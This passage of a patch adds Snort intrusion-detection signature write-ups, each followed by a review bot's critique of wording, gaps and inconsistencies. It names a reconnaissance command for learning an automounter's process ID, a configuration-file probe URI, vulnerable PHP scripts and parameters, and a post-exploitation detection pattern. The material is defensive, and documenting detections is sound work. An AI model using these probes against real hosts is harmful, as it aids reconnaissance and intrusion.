+--
+Detailed Information:
+This is an attempt to gain intelligence on the configuration of a webserver. The httpd.conf file lists the configuration of the webserver including modules loaded on start and access authorization files. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'conf/httpd.conf'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Making the file read only by the superuser on the system will disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+
+--
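Review bot: this file has no Affected Systems section, the Summary ("Attempted httpd configuration access via web") is a fragment rather than the "This event is generated when ..." sentence the other docs use, and the Contributors list names no author. In Attack Scenarios, 'conf/httpd.conf'in is missing a space before "in", and in Corrective Action "outside of it's designated web root" should be "its". Corrective Action also opens with a blank line that the other sections do not have.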
--- /dev/null
+++ b/doc/signatures/699.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+699
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
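Review bot: the Affected Systems section is empty and the Summary only says "a known vulnerability in Microsoft SQL" without naming it, while Detailed Information then describes generic unauthorized access rather than a specific flaw. Either name the vulnerability, with a CVE or vendor bulletin under Additional References (also empty), or reword the Summary to say this is a generic unauthorized-access rule so the reader is not sent looking for a specific patch.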
--- /dev/null
+++ b/doc/signatures/100000497.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000497
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Calendarix" application running on a webserver. Access to 
+the file "cal_event.php" with SQL commands being passed as the "id" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "cal_event.php" script used by the 
+"Calendarix" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Calendarix
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
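Review bot: the second paragraph of Detailed Information is a comma splice ("... compromise the database backend for the application, the attacker may also be able to execute ..."); split it into two sentences. "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing", and the `--` separators after Sid, Affected Systems and Contributors lack the blank line used elsewhere. The third paragraph about client credential validation is CGI boilerplate that does not describe SQL injection via the "id" parameter and could be dropped.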
--- /dev/null
+++ b/doc/signatures/100000371.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000371
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_ranks.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_ranks.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
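Review bot: Additional References is empty although the Summary names a specific vulnerable script and parameter (`admin_ranks.php`, `phpbb_root_path`); add the advisory for the phpNuke remote file include so a reader can check what versions the rule covers. Wording in the same hunk: `may indicate that an exploitation attempt has been attempted` is redundant (suggest `may indicate an exploitation attempt`), `running ona web server` is missing a space, and `attackers choosing` needs an apostrophe. The two blank lines before `Rule:` at the top of the file also differ from the other signature files, which begin with `Rule:` on the first line.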
--- /dev/null
+++ b/doc/signatures/579.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+579
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) mountd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port mountd is using.  Attackers can also learn what versions of the mountd protocol are accepted by mountd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as mountd run.  The mountd RPC service allows remote file system access through Network File System (NFS).  A vulnerability exists in the code that logs NFS mount activity that can cause a buffer overflow, allowing the execution of arbitrary code with root privileges.
+
+--
+Affected Systems:
+Caldera OpenLinux Standard 1.2
+RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where mountd runs.  This may be a precursor to accessing mountd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access mountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for mountd, not probes of the mountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the mountd service itself. An attacker may attempt to go directly to the mountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/121
+
+CERT
+http://www.cert.org/advisories/CA-1998-12.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS13
+
+
+--
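Review bot: Affected Systems (`Caldera OpenLinux Standard 1.2` and the RedHat version list) covers only the platforms hit by the mountd logging overflow mentioned at the end of Detailed Information, but the rule itself fires on a portmap GETPORT request, which any host running the portmapper will answer; the section should state that the probe concerns all RPC hosts and that the version list belongs to the overflow referenced through CA-1998-12. The False Negatives paragraph is the clearest statement of what the rule does and does not cover and is worth echoing in Summary. Trailing whitespace on `+Simple.  ` and `+Arachnids `, and a double blank line before the closing `--`.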
--- /dev/null
+++ b/doc/signatures/1885.txt
@@ -0,0 +1,72 @@
+Rule:
+
+
+--
+Sid: 
+
+1885
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands
+remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(http)" is an output of an "id" command indicating that the user
+has "http" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+
+a buffer overflow exploit against the WWW server
+results in "/bin/sh" being executed. An automated script performing an
+attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives:
+None Known
+
+the signature will trigger if a legitimate system
+administrator executes the "id" command over the telnet connection
+which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: not known
+
+-- 
+Corrective Action:
+
+investigate the server for signs of compromise, run
+the integrity checking software, look for other IDS alerts involving
+the same IP addresses.
+
+--
+Contributors: Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
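Review bot: False Positives contradicts itself: `None Known` is immediately followed by `the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection`; drop the `None Known` line and keep the description. Summary says only `This rule has been placed in deleted.rules` and never states what the signature matched (the `uid=` and `(http)` output of `id` described under Detailed Information); a one-line statement of the detection belongs there next to the deleted.rules note. Formatting also deviates from the other files: `Sid: ` and `-- ` carry trailing spaces, the Sid value sits after a blank line, `False Negatives: not known` and the Contributors entry are inline where every other file puts the value on the following line, and Affected Systems holds only a whitespace line.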
--- /dev/null
+++ b/doc/signatures/100000812.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000812
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "index.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
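Review bot: the section separators are inconsistent with the rest of the patch: `--` follows `100000812`, `All systems running CGI applications using SimpleBoard SBP` and the Contributors block directly, without the blank line used elsewhere. Additional References is empty even though the Summary identifies the script and parameter (`index.php`, `sbp`); add the advisory link. Detailed Information is the same generic CGI boilerplate as the other remote file include files in this patch, including `running ona web server` and `attackers choosing`.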
--- /dev/null
+++ b/doc/signatures/457.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+457
+
+--
+Summary:
+This event is generated when an ICMP type 14 is detected that does not 
+include the necessary code in the packet.
+
+
+--
+Impact:
+
+Can be used as a reconnaissance tool.  Traceroute reveals information
+about the layout of a network.
+
+--
+Detailed Information:
+There are at least three different implementations of traceroute.  In
+one implementation traceroute works by sending an ICMP Echo Request
+packet to a destination host with a TTL value of 1.  If the host is more
+than one hop away, the first route that receives the back will send back
+an ICMP packet indicating that the TTL was exceeded.  The address of
+this router is then listed as the first hop.  The packet is then sent
+out again with a TTL of 2.  This continues until the destination host is
+able to reply or some maximum TTL value is reached.
+
+The other two implementations use the same TTL-based concept with an
+ICMP type of 30(traceroute) or with an UDP packet destined for an
+ephemeral port.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+
+Traceroute is often used against machines on a network prior to an
+attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP type 30 messages.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Miscellaneous
+http://www.faqs.org/rfcs/rfc1393.html
+
+
+
+
+
+--
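Review bot: the sections describe different things. Summary says the event fires on `an ICMP type 14` packet `that does not include the necessary code` (a timestamp reply with an undefined code), while Detailed Information and Corrective Action (`Block inbound ICMP type 30 messages.`) are about traceroute; either the Summary or the body belongs to a different signature, and Corrective Action must match whatever the rule actually inspects. Detailed Information also has a garbled sentence, `the first route that receives the back will send back an ICMP packet`, presumably `the first router that receives the packet will send back`; `with an UDP packet` should read `with a UDP packet`. False Positives is empty, `contributed by  by` is doubled, and five blank lines precede the closing `--`.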
--- /dev/null
+++ b/doc/signatures/119-6.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-6
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects a
+web request that is using UTF-8 encoding. This may indicate an attempt
+to evade an IDS by obfuscating the request using UTF-8.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker merely needs to encode the request using UTF-8 encoding.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+This may be legitimate behavior. Web clients may use this encoding.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
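Review bot: False Positives says `Web clients may use this encoding` but gives the administrator nothing to act on; since this event comes from the http_inspect pre-processor rather than a rule, the file should point at the pre-processor's configuration documentation for tuning the UTF-8 alert, the way the sfPortscan file in this patch points at README.sfportscan. Corrective Action (`Check the target host for signs of compromise.`) is generic for an evasion indicator; suggest advising the reader to examine the decoded request for the attack the encoding may be hiding. A stray blank line sits between `-- ` and `False Positives:`, and several `-- ` separators carry trailing spaces.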
--- /dev/null
+++ b/doc/signatures/3350.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3350
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
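Review bot: Additional References is empty for a vulnerability that has a vendor bulletin; since Detailed Information describes a buffer overflow in RPC DCOM giving `privileges of the local system account`, the Microsoft bulletin and the CVE entry should be listed. Attack Scenarios (`a request for a file with an overly long filename via a network share`) does not obviously follow from Detailed Information, which speaks of `malformed data via RPC`; a sentence tying the long filename to the DCOM request would help. Impact says `full administrator access` while Detailed Information says local system account; the latter is the precise statement and Impact should use it. Typo: `Expoit code exists` should be `Exploit code exists`.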
--- /dev/null
+++ b/doc/signatures/122-14.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-14
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+filtered decoy protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
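Review bot: spelling in this hunk: `reconnaisance` should be `reconnaissance` and `consititute` should be `constitute`; Corrective Action's `Apply any appropriate vendor supplied patches as appropriate.` doubles `appropriate`. The Summary's `ip filtered decoy protocol scan` would benefit from a one-line gloss of what sfPortscan means by `filtered` and `decoy`, since as written the reader has to open README.sfportscan to learn what was actually detected.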
--- /dev/null
+++ b/doc/signatures/2209.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2209
+
+--
+Summary:
+This event is generated when an attempt is made to access getdoc.cgi on an internal web server. This may indicate an attempt to exploit an authorization bypass vulnerability on Infonautics document subscription sites.
+
+--
+Impact:
+A malicious user may be able to access restricted documents without paying for them.
+
+--
+Detailed Information:
+Infonautics provides online access to research materials, and uses getdoc.cgi to manage the document purchase and view process. A malicious user could alter the content of getdoc.cgi links in order to bypass the payment page, thereby freely viewing documents that they would normally pay money to access.
+
+--
+Affected Systems:
+Infonautics web sites that use getdoc.cgi to manage document access.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to an Infonautics site, and obtains documents that he/she would normally have to pay for.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+If a legitimate user accesses getdoc.cgi on an internal web server, this rule may generate an event.
+ 
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if a fix has been made available.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
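Review bot: the traffic direction is unclear. Summary says `access getdoc.cgi on an internal web server` and False Positives repeats `internal web server`, but Affected Systems says `Infonautics web sites that use getdoc.cgi`, i.e. an external site; state whether the rule watches requests to the protected web servers or requests leaving the network to Infonautics, because that decides which False Positives apply. Corrective Action (`It is not known if a fix has been made available.`) plus the empty Additional References leave the reader with no vendor or advisory to consult. There is a whitespace-only line after the False Positives paragraph and a trailing space on the `-- ` before Additional References.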
--- /dev/null
+++ b/doc/signatures/1032.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1032
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
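Review bot: Summary and Detailed Information are generic (`a known vulnerability in a web server running Microsoft Internet Information Server`, `the attack scenarios are legion`) and never say which request or IIS vulnerability Sid 1032 matches, so a reader cannot judge the `None known.` under False Positives or pick the right patch under Corrective Action; name the matched URI or component and add the advisory under the empty Additional References.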
--- /dev/null
+++ b/doc/signatures/889.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+889
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
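Review bot: the file does not identify the CGI script Sid 889 detects; Summary (`a known vulnerability in a CGI web application`) and Affected Systems (`All systems running CGI applications`) are the same boilerplate used for 1591.txt and 854.txt in this patch, so the three files are indistinguishable. Name the script and parameter and fill Additional References with the advisory. `running ona web server` is missing a space and `attackers choosing` needs an apostrophe.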
--- /dev/null
+++ b/doc/signatures/1954.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1954
+
+--
+Summary:
+This event is generated when a request is made to discover the Process ID (PID) of the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the PID associated with amd.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd  service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its PID.  Learning the PID may help an attacker guess a range of likely PIDs associated with other running services that are either started before or after amd.  This may facilitate an attack against other running processes.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the PID associated with amd.  This information may be used to attack other running processes if the attacker has some means of access to the target host. 
+
+--
+Ease of Attack:
+Simple.  Execute the command 'amq -p -U -h hostname/IP'.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3376.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3376
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
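Review bot: this file is identical to 3350.txt earlier in the patch apart from the Sid, so nothing tells the reader what distinguishes Sid 3376 from 3350 (and from 3230.txt); each should describe the specific RPC DCOM request or transport its rule matches. The comments on 3350.txt apply unchanged: empty Additional References, the `Expoit` typo, and Impact and Detailed Information disagreeing on administrator versus local system privileges.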
--- /dev/null
+++ b/doc/signatures/100000318.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000318
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "phpBazar" application running on a webserver. 
+Access to the file "admin.php" using a remote file being passed as the 
+"action=edit_member&value=1" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "action=edit_member&value=1" parameter in the 
+"admin.php" script used by the "phpBazar" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
